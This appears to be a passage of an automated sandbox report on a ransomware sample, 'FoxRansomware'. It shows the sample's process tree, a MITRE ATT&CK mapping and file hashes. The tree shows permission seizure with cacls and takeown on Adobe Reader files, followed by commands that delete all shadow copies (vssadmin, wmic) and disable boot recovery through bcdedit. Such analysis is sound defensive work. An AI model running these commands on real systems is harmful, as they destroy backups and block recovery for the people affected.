C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:2696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:3264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵
- Modifies file permissions
PID:2976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:3664
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:2192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:2432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:2780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "email_all.gif" -nobanner3⤵PID:2352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "email_all.gif" -nobanner4⤵PID:1592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:3248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:2464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:3960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:2648
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:2112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:4056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "rss.gif" -nobanner3⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "rss.gif" -nobanner4⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:2508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:2108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:2476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:2536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵
- Modifies file permissions
PID:3364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:3632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:3004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SY______.PFM" -nobanner3⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SY______.PFM" -nobanner4⤵PID:784
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:3644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:2584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:2948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:2640
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:3376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:3296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:3384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can129.hsp" -nobanner3⤵PID:3524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can129.hsp" -nobanner4⤵PID:3436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:2552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:1660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:2024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:3940
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:3016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:3068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:3148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3380
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner3⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "background.png" -nobanner4⤵PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4076
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:2468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:3596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:4000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:3304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:2052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:2828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "license.html" -nobanner3⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "license.html" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:3024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵
- Modifies file permissions
PID:3020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:2280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:2512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:3540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_received.gif" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "forms_received.gif" -nobanner4⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:2372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:3324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:2004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:3776
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4086F10C-B1D5-461D-83C7-6680A44A8101} S-1-5-21-778096762-2241304387-192235952-1000:AYFLYVMK\Admin:Interactive:[1]1⤵PID:2704
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat"2⤵PID:4076
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1572
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1924
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2632
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1404
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD55309fe57828185ee0144f8c7a6dac995
SHA14557579cb9c798de9f401cce7d0d212791a65212
SHA256708f05bd3be081167fc0b742b93cc8c191e832d138ce8f2573a733be24f93c04
SHA5125325679ad76a2097dbe6a1d5e22ef23c8a086160b3a7d58be4568d55413a0dff41c93565355d87b2ebbc8c2c86667a7c415445314770add4222a60b2c9726ecd
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
197B
MD519de8a96e95d50dd8c00dc64eccf917a
SHA1a40521e82e86ff52aa497171464ebfa8ae699836
SHA2564ce269751e45e3a61b0ccd05a038634e4b385eb5192c78f9e2aab1e3757e5809
SHA5124f36012bd9b7a6a759e8564dba104b57ec0bf8ff9431de1d90870af00994546ce4dd5778a1376bcc55f5d11ab96bbf7563c7b7764b7a35f16bc00ac6500213af
-
Filesize
273B
MD5d5fbfe6590e17a79ec37b82145bbf7f0
SHA15c8878b4bc17dfcd5d14176f7bf2ee99c03816eb
SHA256a8b60a302f6fd05d26ad4c5af5dd96738782b8b42cf546107fdae81608518aac
SHA512408b0f0e06260b8c2ccab996d08a6da988db22521cffa11d7de5e1b19aa6a8cc6cc34e16ddb2eac2e5648b18d8855b9726c1e6b4976ed9bfccaba095dd192055
-
Filesize
1KB
MD54a6da1c226d8b0baecf7d888e7947685
SHA1d76d75fb425bc5e32849d526f7e3499643d0e5ca
SHA256e2a0df1736e5ffc75bbd8006cdda45eb3c9d1d536be03f52412fe0a496b53706
SHA512767355c7adf6322dfcfb0893627ddfe1b14ce7cc285d7b5a824045f16c9431f5d24823d4512f6d78d71f84aaae12e0fbe6841994e6583e6bb91bb58641e1b4ce
-
Filesize
2KB
MD5c9496997525cff695f3d6f3943f2c7b6
SHA1f549d919deefa68c8166bd7a26ebc47d40bd7db6
SHA25661c4cd403170e5670978de94208e91cce0d746e6a5802cbbe83df7b1b0d5481b
SHA5122e9ceba83714e70e6ce5ac0f4539b7625755f931cb297cb2b1c1bf488b09ffaab4c451d3a312bc9eb2a33859f5b4818bc07a3bbd1d6dad966c7d899e6fb0d36c
-
Filesize
2KB
MD5f56a37448a8b51beeca1117fee9b6b0c
SHA12a805ee51b8d8b4aa3042cdbf6d7e2f7f87e02db
SHA2562f50b534f499355f2ca63d1ebf6ac81f0a3af6a397ebfa582293ffdf5ca36e28
SHA512c31105694888f7ac5c45b93765de7c7736515cf5f7f0d5dc11efa1984360d803527ad512adb8269333548c5be65805ee9c3d2c0c44d37789e45cebc4b21dbe8e
-
Filesize
3KB
MD527ed9b2eb136390d31f7bcebbe9afa29
SHA1135ef2bfd0fa3bccee7ab1149af861133ca7ab90
SHA256307a5afe2dfe6d139c3c366cfc1989b36d5f426e8baa4e8e16b4b9908c92eee2
SHA512e175c6e7543055906d8adba5fbe653b7e2174ef57aea3debd00bc8e0cbae11c894f216c64ebc3a1dba29786001f717cbdb5af9a1e6d84129ca9dcfe1c1a039ed
-
Filesize
24KB
MD58f541954992930c94b2e3b923f0ffd8f
SHA11638613e45aef845ae78d90d44026fa3f535980a
SHA256cd26c0fc8cc54d1651bb870279d98a3f6478d9277bb4f9172e18a8ab96ca1381
SHA512de990814010f15dcc1c424de82640e4d3043c97576e3c38bc096a6c20b6cb84ed472eabff16b8ccbfc0e244469c567cce1241974a9f6d48450078232b78a73f0
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
226B
MD5dbb166b2cffc079b44924e92466171d7
SHA1cb823da5de668ee405b06017dd985771027e79d3
SHA256e6c5dcc5439aa68cfeee91ce1a470378c695e48b57c0cd4d6bc13d284f9802a7
SHA512d235662d33c9308e3c100ae7b602424ee1a773d53f2bf59f1821c31f2a8eef7f24b7417484dca76e1c5bd48372c332c27cfbfc132747b985222800103d93b220
-
Filesize
265B
MD5709496a7457cd02ed24b9e66adf6bf27
SHA17b8bcd5cb4509e9977d78875020f254ac76d1686
SHA25669143ed1105df5c01cd16a8628265930cc1c3a52977a100f28e02e56e9b8cfc8
SHA51275137b9f3c83168618d18bd5677ad4d74ff82f89060ce477f3fd48f14bbf60f4487639945b7c91d6125045653a59a09945644b60cd3c2b26c8742859f36dcbf1
-
Filesize
260B
MD554d637bfafe6569b860104aabd8e6a75
SHA17714e949108aa00ab9bba3bf562cfebf8e8cd367
SHA256dedb43d8daa5b13115a0416246b29cfeea294ac38f1c3f5dbbebe28df94f04c3
SHA51299166447bfcd35244c27c9d8aa320b6b1a4eeccb095d49f8a97d9fdd31f905d7896eec287f63166d5423bf84cd884d0fca9fe9db035d9106fc1e293d64a26c50
-
Filesize
1.2MB
MD5c82d64850d35cc6a536c11adbd261cf6
SHA19f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002